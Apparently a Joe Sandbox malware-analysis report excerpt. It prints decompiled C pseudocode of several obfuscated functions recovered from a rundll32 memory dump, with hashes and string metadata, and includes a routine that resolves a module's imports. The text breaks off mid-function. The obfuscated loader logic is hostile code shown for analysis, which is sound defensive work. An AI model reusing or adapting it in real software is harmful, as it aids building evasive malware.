                                                                                                                                                            				_v32 = _v32 << 0xf;
                                                                                                                                                            				_v32 = _v32 >> 6;
                                                                                                                                                            				_v32 = _v32 ^ 0x00f599ec;
                                                                                                                                                            				_v36 = 0x8d7ece;
                                                                                                                                                            				_v36 = _v36 + 0xd96f;
                                                                                                                                                            				_v36 = _v36 + 0x3e8b;
                                                                                                                                                            				_v36 = _v36 ^ 0x008d6b01;
                                                                                                                                                            				_v60 = 0x740a18;
                                                                                                                                                            				_v60 = _v60 + 0x5af6;
                                                                                                                                                            				_t167 = 0x2d;
                                                                                                                                                            				_v60 = _v60 / _t167;
                                                                                                                                                            				_t168 = 0xc;
                                                                                                                                                            				_v60 = _v60 / _t168;
                                                                                                                                                            				_v60 = _v60 ^ 0x000f4a79;
                                                                                                                                                            				_v48 = 0xecd979;
                                                                                                                                                            				_v48 = _v48 + 0xffff2496;
                                                                                                                                                            				_t169 = 3;
                                                                                                                                                            				_v48 = _v48 / _t169;
                                                                                                                                                            				_v48 = _v48 ^ 0xbc9c03a4;
                                                                                                                                                            				_v48 = _v48 ^ 0xbcdb2390;
                                                                                                                                                            				_v52 = 0x17ff93;
                                                                                                                                                            				_v52 = _v52 << 0xd;
                                                                                                                                                            				_v52 = _v52 + 0x3109;
                                                                                                                                                            				_v52 = _v52 ^ 0x7590f195;
                                                                                                                                                            				_v52 = _v52 ^ 0x8a641707;
                                                                                                                                                            				_v20 = 0x28811b;
                                                                                                                                                            				_v20 = _v20 * 0x25;
                                                                                                                                                            				_v20 = _v20 ^ 0x05ddec85;
                                                                                                                                                            				_v56 = 0x23ad29;
                                                                                                                                                            				_t170 = 0x5a;
                                                                                                                                                            				_v56 = _v56 / _t170;
                                                                                                                                                            				_v56 = _v56 >> 8;
                                                                                                                                                            				_v56 = _v56 ^ 0x06fabbcf;
                                                                                                                                                            				_v56 = _v56 ^ 0x06fdb2ad;
                                                                                                                                                            				_v28 = 0x8d9789;
                                                                                                                                                            				_v28 = _v28 | 0x3813f7c3;
                                                                                                                                                            				_v28 = _v28 + 0xa24c;
                                                                                                                                                            				_v28 = _v28 ^ 0x38ab2d0e;
                                                                                                                                                            				_v16 = 0x83a12;
                                                                                                                                                            				_v16 = _v16 << 0xb;
                                                                                                                                                            				_v16 = _v16 ^ 0x41de3db0;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					_t192 =  *_t191;
                                                                                                                                                            					if(_t192 == 0) {
                                                                                                                                                            						break;
                                                                                                                                                            					}
                                                                                                                                                            					if( *((intOrPtr*)(_t192 + 0x38)) == 0) {
                                                                                                                                                            						L4:
                                                                                                                                                            						 *_t191 =  *_t192;
                                                                                                                                                            						_t160 = E00388519(_v28, _v16, _t192);
                                                                                                                                                            					} else {
                                                                                                                                                            						_t133 =  &_v40; // 0xebebe2
                                                                                                                                                            						_t160 = E00378DC4( *_t133, _v68, _v24, _v44,  *((intOrPtr*)(_t192 + 0x2c)), _t164);
                                                                                                                                                            						_t194 =  &(_t194[4]);
                                                                                                                                                            						if(_t160 != _v64) {
                                                                                                                                                            							_t191 = _t192;
                                                                                                                                                            						} else {
                                                                                                                                                            							 *((intOrPtr*)(_t192 + 0x1c))( *((intOrPtr*)(_t192 + 0x38)), 0, 0);
                                                                                                                                                            							E00389E56(_v44, _v48, _v72,  *((intOrPtr*)(_t192 + 0x38)));
                                                                                                                                                            							E00381E67(_v60, _v64, _v32, _v68,  *((intOrPtr*)(_t192 + 0x2c)));
                                                                                                                                                            							_t194 =  &(_t194[5]);
                                                                                                                                                            							goto L4;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				return _t160;
                                                                                                                                                            			}

































                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 1$
                                                                                                                                                            • API String ID: 0-209397207
                                                                                                                                                            • Opcode ID: caadbf1ff78a5c7f74b484d861a07374aec65739c84b0573b06005148360be51
                                                                                                                                                            • Instruction ID: 303af6821e89709f5d7878f8f414f73142045ca4e665a778525a70b49f81efba
                                                                                                                                                            • Opcode Fuzzy Hash: caadbf1ff78a5c7f74b484d861a07374aec65739c84b0573b06005148360be51
                                                                                                                                                            • Instruction Fuzzy Hash: 5D614FB25083419FC399DF21D48940BBBF1FBC9728F509A1DF19A96260C7B1DA4ACF42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E0037AEFB(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                                                                                                                            				char _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				void* _t116;
                                                                                                                                                            				void* _t130;
                                                                                                                                                            				intOrPtr _t133;
                                                                                                                                                            				void* _t137;
                                                                                                                                                            				intOrPtr* _t154;
                                                                                                                                                            				void* _t155;
                                                                                                                                                            				signed int _t156;
                                                                                                                                                            				signed int _t157;
                                                                                                                                                            				signed int _t158;
                                                                                                                                                            				signed int _t159;
                                                                                                                                                            				void* _t161;
                                                                                                                                                            				void* _t162;
                                                                                                                                                            
                                                                                                                                                            				_t135 = _a12;
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_t154 = __ecx;
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t116);
                                                                                                                                                            				_v44 = 0xe8605f;
                                                                                                                                                            				_t162 = _t161 + 0x18;
                                                                                                                                                            				_v44 = _v44 + 0x84a0;
                                                                                                                                                            				_v44 = _v44 ^ 0x00e8e4ff;
                                                                                                                                                            				_t155 = 0;
                                                                                                                                                            				_v68 = 0xe00e28;
                                                                                                                                                            				_t137 = 0xc99b7e9;
                                                                                                                                                            				_v68 = _v68 << 9;
                                                                                                                                                            				_v68 = _v68 << 2;
                                                                                                                                                            				_t156 = 0x3b;
                                                                                                                                                            				_v68 = _v68 / _t156;
                                                                                                                                                            				_v68 = _v68 ^ 0x0001eb63;
                                                                                                                                                            				_v76 = 0x5a4023;
                                                                                                                                                            				_v76 = _v76 >> 0xf;
                                                                                                                                                            				_t157 = 0x5b;
                                                                                                                                                            				_v76 = _v76 * 0x13;
                                                                                                                                                            				_v76 = _v76 ^ 0x64c481b8;
                                                                                                                                                            				_v76 = _v76 ^ 0x64ccd277;
                                                                                                                                                            				_v64 = 0xe36df4;
                                                                                                                                                            				_v64 = _v64 / _t157;
                                                                                                                                                            				_t158 = 9;
                                                                                                                                                            				_v64 = _v64 * 0x52;
                                                                                                                                                            				_v64 = _v64 ^ 0x00c8b522;
                                                                                                                                                            				_v80 = 0x952e3b;
                                                                                                                                                            				_v80 = _v80 >> 6;
                                                                                                                                                            				_v80 = _v80 ^ 0xc023484e;
                                                                                                                                                            				_v80 = _v80 / _t158;
                                                                                                                                                            				_v80 = _v80 ^ 0x155df6ec;
                                                                                                                                                            				_v72 = 0x4bfcfc;
                                                                                                                                                            				_v72 = _v72 | 0x0a339af0;
                                                                                                                                                            				_v72 = _v72 << 0xf;
                                                                                                                                                            				_t159 = 0x12;
                                                                                                                                                            				_v72 = _v72 / _t159;
                                                                                                                                                            				_v72 = _v72 ^ 0x0e3e5ce5;
                                                                                                                                                            				_v40 = 0xc0630c;
                                                                                                                                                            				_v40 = _v40 | 0x5d0d844d;
                                                                                                                                                            				_v40 = _v40 ^ 0x5dc4e99c;
                                                                                                                                                            				_v52 = 0x98b7b;
                                                                                                                                                            				_v52 = _v52 + 0xa105;
                                                                                                                                                            				_v52 = _v52 >> 5;
                                                                                                                                                            				_v52 = _v52 ^ 0x0004c78d;
                                                                                                                                                            				_v56 = 0xd0814a;
                                                                                                                                                            				_v56 = _v56 >> 9;
                                                                                                                                                            				_v56 = _v56 * 0x3e;
                                                                                                                                                            				_v56 = _v56 ^ 0x001a31dc;
                                                                                                                                                            				_v60 = 0xb9e1cb;
                                                                                                                                                            				_v60 = _v60 * 0x25;
                                                                                                                                                            				_v60 = _v60 << 0xa;
                                                                                                                                                            				_v60 = _v60 ^ 0x768204a8;
                                                                                                                                                            				_v48 = 0xccd34a;
                                                                                                                                                            				_v48 = _v48 + 0xffff20ce;
                                                                                                                                                            				_v48 = _v48 ^ 0x00ce4dff;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t137 != 0x8f26e2d) {
                                                                                                                                                            						if(_t137 == 0xc99b7e9) {
                                                                                                                                                            							_t137 = 0x8f26e2d;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t137 != 0xfe1ef29) {
                                                                                                                                                            								goto L10;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t133 =  *0x393dfc; // 0x0
                                                                                                                                                            								E0038E274(_v72, _v40, _t137,  *_t135,  *((intOrPtr*)(_t135 + 4)), _v44, _v52, _v56, _v60, _t137,  *((intOrPtr*)(_t133 + 0x40)), _v48,  &_v36);
                                                                                                                                                            								_t155 =  ==  ? 1 : _t155;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L5:
                                                                                                                                                            						return _t155;
                                                                                                                                                            					}
                                                                                                                                                            					_push( *_t154);
                                                                                                                                                            					_t130 = E0038AE6D(_v76,  &_v36,  *((intOrPtr*)(_t154 + 4)), _v64, _t137, _v80);
                                                                                                                                                            					_t162 = _t162 + 0x14;
                                                                                                                                                            					if(_t130 == 0) {
                                                                                                                                                            						_t137 = 0xeaa5f76;
                                                                                                                                                            						goto L10;
                                                                                                                                                            					} else {
                                                                                                                                                            						_t137 = 0xfe1ef29;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					goto L5;
                                                                                                                                                            					L10:
                                                                                                                                                            				} while (_t137 != 0xeaa5f76);
                                                                                                                                                            				goto L5;
                                                                                                                                                            			}




























                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: #@Z$_`
                                                                                                                                                            • API String ID: 0-2586238014
                                                                                                                                                            • Opcode ID: b898d7bdf645e710b9d03d92e66f1abc8df98a289cfb113607ae668b807a0569
                                                                                                                                                            • Instruction ID: 4bef66bcfe75f8d45c2f4ea589111bd74b81ae22c4b78a5225bc47a621d43aba
                                                                                                                                                            • Opcode Fuzzy Hash: b898d7bdf645e710b9d03d92e66f1abc8df98a289cfb113607ae668b807a0569
                                                                                                                                                            • Instruction Fuzzy Hash: 815113721083009FC719CF62C88A81BFBE5FBD8758F549A1DF59A96260C376CA49CF46
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E0037DFF3() {
                                                                                                                                                            				signed int _v4;
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				intOrPtr _t128;
                                                                                                                                                            				intOrPtr _t131;
                                                                                                                                                            				signed int _t133;
                                                                                                                                                            				signed int _t134;
                                                                                                                                                            				intOrPtr _t135;
                                                                                                                                                            				void* _t143;
                                                                                                                                                            				void* _t146;
                                                                                                                                                            				signed int* _t148;
                                                                                                                                                            
                                                                                                                                                            				_t148 =  &_v52;
                                                                                                                                                            				_v12 = 0xa1a716;
                                                                                                                                                            				_v12 = _v12 + 0x2188;
                                                                                                                                                            				_v12 = _v12 ^ 0x00a02056;
                                                                                                                                                            				_v32 = 0x472a3;
                                                                                                                                                            				_v32 = _v32 + 0x22e5;
                                                                                                                                                            				_v32 = _v32 ^ 0xff9fab52;
                                                                                                                                                            				_v32 = _v32 ^ 0xff9c5b0a;
                                                                                                                                                            				_v48 = 0x9a7516;
                                                                                                                                                            				_v48 = _v48 + 0xffff4702;
                                                                                                                                                            				_v48 = _v48 * 0x45;
                                                                                                                                                            				_v48 = _v48 + 0xffff2ff5;
                                                                                                                                                            				_t146 = 0x4903f33;
                                                                                                                                                            				_v48 = _v48 ^ 0x296ff1ed;
                                                                                                                                                            				_v16 = 0xfa3b71;
                                                                                                                                                            				_v16 = _v16 << 9;
                                                                                                                                                            				_v16 = _v16 ^ 0xf47f6bba;
                                                                                                                                                            				_v20 = 0xc0b9b;
                                                                                                                                                            				_t133 = 0x7b;
                                                                                                                                                            				_v20 = _v20 * 0x52;
                                                                                                                                                            				_v20 = _v20 ^ 0x03d2ca7d;
                                                                                                                                                            				_v36 = 0x400b3e;
                                                                                                                                                            				_v36 = _v36 ^ 0xba288636;
                                                                                                                                                            				_v36 = _v36 ^ 0xc4c376ba;
                                                                                                                                                            				_v36 = _v36 ^ 0x7eaacb92;
                                                                                                                                                            				_v52 = 0x3419b2;
                                                                                                                                                            				_v52 = _v52 / _t133;
                                                                                                                                                            				_v52 = _v52 >> 0xc;
                                                                                                                                                            				_v52 = _v52 | 0xcef26f8a;
                                                                                                                                                            				_v52 = _v52 ^ 0xcef1d6cf;
                                                                                                                                                            				_v4 = 0xb26f64;
                                                                                                                                                            				_t134 = 3;
                                                                                                                                                            				_v4 = _v4 / _t134;
                                                                                                                                                            				_v4 = _v4 ^ 0x003ff5cc;
                                                                                                                                                            				_v40 = 0x34a33d;
                                                                                                                                                            				_v40 = _v40 >> 4;
                                                                                                                                                            				_v40 = _v40 ^ 0xd21b54bd;
                                                                                                                                                            				_v40 = _v40 ^ 0x33ae4ce0;
                                                                                                                                                            				_v40 = _v40 ^ 0xe1b00bb7;
                                                                                                                                                            				_v8 = 0x4c76b4;
                                                                                                                                                            				_v8 = _v8 << 2;
                                                                                                                                                            				_v8 = _v8 ^ 0x013e4034;
                                                                                                                                                            				_v24 = 0x1c9e42;
                                                                                                                                                            				_v24 = _v24 ^ 0x4f10b4b5;
                                                                                                                                                            				_v24 = _v24 << 4;
                                                                                                                                                            				_v24 = _v24 ^ 0xf0cd9088;
                                                                                                                                                            				_v44 = 0xfe69b1;
                                                                                                                                                            				_v44 = _v44 >> 0xd;
                                                                                                                                                            				_v44 = _v44 * 0x49;
                                                                                                                                                            				_v44 = _v44 * 0x7d;
                                                                                                                                                            				_v44 = _v44 ^ 0x011db47c;
                                                                                                                                                            				_v28 = 0x46ec28;
                                                                                                                                                            				_v28 = _v28 << 9;
                                                                                                                                                            				_v28 = _v28 * 0x58;
                                                                                                                                                            				_v28 = _v28 ^ 0xc2551a85;
                                                                                                                                                            				_t135 =  *0x393e0c; // 0x0
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t146 != 0x4903f33) {
                                                                                                                                                            						if(_t146 == 0x6f617aa) {
                                                                                                                                                            							_t128 = E003746BE(_t135, _v4, _t135, _v40, _t135, _v8, _v24, _v44, _t135, 0, E003781B7, _v28);
                                                                                                                                                            							_t135 =  *0x393e0c; // 0x0
                                                                                                                                                            							 *((intOrPtr*)(_t135 + 0x10)) = _t128;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t146 != 0xc69f0b3) {
                                                                                                                                                            								goto L6;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t131 = E00377AF6(_v16, _t135, _v20, _t135, _v36, _t135, _v52);
                                                                                                                                                            								_t135 =  *0x393e0c; // 0x0
                                                                                                                                                            								_t148 =  &(_t148[6]);
                                                                                                                                                            								_t146 = 0x6f617aa;
                                                                                                                                                            								 *((intOrPtr*)(_t135 + 8)) = _t131;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L9:
                                                                                                                                                            						return 0 | _t135 != 0x00000000;
                                                                                                                                                            					}
                                                                                                                                                            					_push(_t135);
                                                                                                                                                            					_push(_t135);
                                                                                                                                                            					_t143 = 0x24;
                                                                                                                                                            					_t135 = E00377FF2(_t143);
                                                                                                                                                            					_t146 = 0xc69f0b3;
                                                                                                                                                            					 *0x393e0c = _t135;
                                                                                                                                                            					L6:
                                                                                                                                                            				} while (_t146 != 0xab42793);
                                                                                                                                                            				goto L9;
                                                                                                                                                            			}

                                                                                                                                                            0x0037e18b
                                                                                                                                                            0x0037e195
                                                                                                                                                            0x0037e199
                                                                                                                                                            0x0037e1a1
                                                                                                                                                            0x0037e1a7
                                                                                                                                                            0x0037e1a7
                                                                                                                                                            0x0037e1ad
                                                                                                                                                            0x0037e229
                                                                                                                                                            0x0037e22e
                                                                                                                                                            0x0037e237
                                                                                                                                                            0x0037e1af
                                                                                                                                                            0x0037e1b1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e1b3
                                                                                                                                                            0x0037e1c6
                                                                                                                                                            0x0037e1cb
                                                                                                                                                            0x0037e1d1
                                                                                                                                                            0x0037e1d4
                                                                                                                                                            0x0037e1d6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e1d6
                                                                                                                                                            0x0037e1b1
                                                                                                                                                            0x0037e23b
                                                                                                                                                            0x0037e248
                                                                                                                                                            0x0037e248
                                                                                                                                                            0x0037e1e7
                                                                                                                                                            0x0037e1e8
                                                                                                                                                            0x0037e1eb
                                                                                                                                                            0x0037e1f3
                                                                                                                                                            0x0037e1f5
                                                                                                                                                            0x0037e1f7
                                                                                                                                                            0x0037e1fd
                                                                                                                                                            0x0037e1fd
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: (F$"
                                                                                                                                                            • API String ID: 0-1034852068
                                                                                                                                                            • Opcode ID: e25e782e998fe1db7c0f61b300ee240100d3e345bd9c4a508e1ffffb108ad4bd
                                                                                                                                                            • Instruction ID: 5e3c61ae50a852e60b61030cd418557e02424fc2330798f7744d7479c51daeea
                                                                                                                                                            • Opcode Fuzzy Hash: e25e782e998fe1db7c0f61b300ee240100d3e345bd9c4a508e1ffffb108ad4bd
                                                                                                                                                            • Instruction Fuzzy Hash: 7F51447140D3019FC359CF25D98A80FBBE1EB88758F50891DF599AA260D3B5DA09CF87
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                            			E00377C37(void* __ecx, void* __edx) {
                                                                                                                                                            				void* _t91;
                                                                                                                                                            				void* _t102;
                                                                                                                                                            				signed short _t108;
                                                                                                                                                            				signed short _t111;
                                                                                                                                                            				signed short _t113;
                                                                                                                                                            				signed int _t115;
                                                                                                                                                            				signed int _t116;
                                                                                                                                                            				signed int _t117;
                                                                                                                                                            				signed short _t121;
                                                                                                                                                            				intOrPtr _t128;
                                                                                                                                                            				signed short* _t132;
                                                                                                                                                            				signed short _t133;
                                                                                                                                                            				intOrPtr _t134;
                                                                                                                                                            				void* _t135;
                                                                                                                                                            				void* _t136;
                                                                                                                                                            
                                                                                                                                                            				_t134 =  *((intOrPtr*)(_t135 + 0x30));
                                                                                                                                                            				_push(_t134);
                                                                                                                                                            				_push( *((intOrPtr*)(_t135 + 0x38)));
                                                                                                                                                            				_push( *((intOrPtr*)(_t135 + 0x38)));
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t91);
                                                                                                                                                            				 *((intOrPtr*)(_t135 + 0x2c)) = 0x3628ac;
                                                                                                                                                            				_t136 = _t135 + 0x14;
                                                                                                                                                            				 *(_t136 + 0x18) =  *(_t136 + 0x18) + 0xfffff240;
                                                                                                                                                            				_t115 = 0x47;
                                                                                                                                                            				 *(_t136 + 0x1c) =  *(_t136 + 0x18) * 0x5d;
                                                                                                                                                            				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x13a7c7bd;
                                                                                                                                                            				 *(_t136 + 0x28) = 0x411077;
                                                                                                                                                            				 *(_t136 + 0x28) =  *(_t136 + 0x28) / _t115;
                                                                                                                                                            				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x0001576b;
                                                                                                                                                            				 *(_t136 + 0x14) = 0x6ab109;
                                                                                                                                                            				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4522ba60;
                                                                                                                                                            				 *(_t136 + 0x14) =  *(_t136 + 0x14) + 0x6e2e;
                                                                                                                                                            				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x405c50e2;
                                                                                                                                                            				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0x45775e58;
                                                                                                                                                            				 *(_t136 + 0x3c) = 0x583f0;
                                                                                                                                                            				_t116 = 0x13;
                                                                                                                                                            				 *(_t136 + 0x38) =  *(_t136 + 0x3c) / _t116;
                                                                                                                                                            				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0xb139aa03;
                                                                                                                                                            				 *(_t136 + 0x38) =  *(_t136 + 0x38) * 0x57;
                                                                                                                                                            				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0x3aa1b70d;
                                                                                                                                                            				 *(_t136 + 0x28) = 0xeb6063;
                                                                                                                                                            				 *(_t136 + 0x28) =  *(_t136 + 0x28) >> 9;
                                                                                                                                                            				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x000c5736;
                                                                                                                                                            				 *(_t136 + 0x20) = 0x8f08a1;
                                                                                                                                                            				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x1f969638;
                                                                                                                                                            				 *(_t136 + 0x20) =  *(_t136 + 0x20) >> 2;
                                                                                                                                                            				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x07c9f7a9;
                                                                                                                                                            				 *(_t136 + 0x1c) = 0x46d0e7;
                                                                                                                                                            				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) >> 6;
                                                                                                                                                            				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) * 0x16;
                                                                                                                                                            				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x00141072;
                                                                                                                                                            				 *(_t136 + 0x14) = 0x9e0f5b;
                                                                                                                                                            				 *(_t136 + 0x14) =  *(_t136 + 0x14) * 0x61;
                                                                                                                                                            				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4163d75f;
                                                                                                                                                            				 *(_t136 + 0x14) =  *(_t136 + 0x14) << 6;
                                                                                                                                                            				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0xf8f2ab9c;
                                                                                                                                                            				_t117 =  *(_t136 + 0x18);
                                                                                                                                                            				_t102 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                                                                                                                                                            				_t128 =  *((intOrPtr*)(_t102 + 0x78 + _t117 * 8));
                                                                                                                                                            				if(_t128 == 0 ||  *((intOrPtr*)(_t102 + 0x7c + _t117 * 8)) == 0) {
                                                                                                                                                            					L13:
                                                                                                                                                            					return 1;
                                                                                                                                                            				} else {
                                                                                                                                                            					_t133 = _t128 + _t134;
                                                                                                                                                            					while(1) {
                                                                                                                                                            						_t105 =  *((intOrPtr*)(_t133 + 0xc));
                                                                                                                                                            						if( *((intOrPtr*)(_t133 + 0xc)) == 0) {
                                                                                                                                                            							goto L13;
                                                                                                                                                            						}
                                                                                                                                                            						_t121 = E0038CADF( *((intOrPtr*)(_t136 + 0x2c)), _t105 + _t134,  *(_t136 + 0x14),  *(_t136 + 0x38));
                                                                                                                                                            						 *(_t136 + 0x18) = _t121;
                                                                                                                                                            						__eflags = _t121;
                                                                                                                                                            						if(_t121 == 0) {
                                                                                                                                                            							L15:
                                                                                                                                                            							return 0;
                                                                                                                                                            						}
                                                                                                                                                            						_t132 =  *_t133 + _t134;
                                                                                                                                                            						_t113 =  *((intOrPtr*)(_t133 + 0x10)) + _t134;
                                                                                                                                                            						while(1) {
                                                                                                                                                            							_t108 =  *_t132;
                                                                                                                                                            							__eflags = _t108;
                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							if(__eflags >= 0) {
                                                                                                                                                            								_t110 = _t108 + 2 + _t134;
                                                                                                                                                            								__eflags = _t108 + 2 + _t134;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t110 = _t108 & 0x0000ffff;
                                                                                                                                                            							}
                                                                                                                                                            							_t111 = E00376CA0( *((intOrPtr*)(_t136 + 0x34)),  *((intOrPtr*)(_t136 + 0x2c)), _t110,  *((intOrPtr*)(_t136 + 0x24)),  *(_t136 + 0x18), _t121);
                                                                                                                                                            							_t136 = _t136 + 0x10;
                                                                                                                                                            							__eflags = _t111;
                                                                                                                                                            							if(_t111 == 0) {
                                                                                                                                                            								goto L15;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t121 =  *(_t136 + 0x18);
                                                                                                                                                            								_t132 =  &(_t132[2]);
                                                                                                                                                            								 *_t113 = _t111;
                                                                                                                                                            								_t113 = _t113 + 4;
                                                                                                                                                            								__eflags = _t113;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						_t133 = _t133 + 0x14;
                                                                                                                                                            						__eflags = _t133;
                                                                                                                                                            					}
                                                                                                                                                            					goto L13;
                                                                                                                                                            				}
                                                                                                                                                            			}



















                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: X^wE$c`
                                                                                                                                                            • API String ID: 0-1321574684
                                                                                                                                                            • Opcode ID: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                                                            • Instruction ID: 9dad3683c3b536e7bc2c46d96a7959ff7fe4c7800d874ca350df9c62cac133ed
                                                                                                                                                            • Opcode Fuzzy Hash: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                                                            • Instruction Fuzzy Hash: 895184715083429FC729DF24D88692BBBE1FFC4358F11881DF49A96221E375DA49CF92
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                            			E00374C5D(intOrPtr _a4) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                            				void* _t106;
                                                                                                                                                            				void* _t108;
                                                                                                                                                            				intOrPtr* _t109;
                                                                                                                                                            				signed int _t112;
                                                                                                                                                            				signed int _t113;
                                                                                                                                                            				signed int _t114;
                                                                                                                                                            				intOrPtr _t128;
                                                                                                                                                            
                                                                                                                                                            				_v44 = _v44 & 0x00000000;
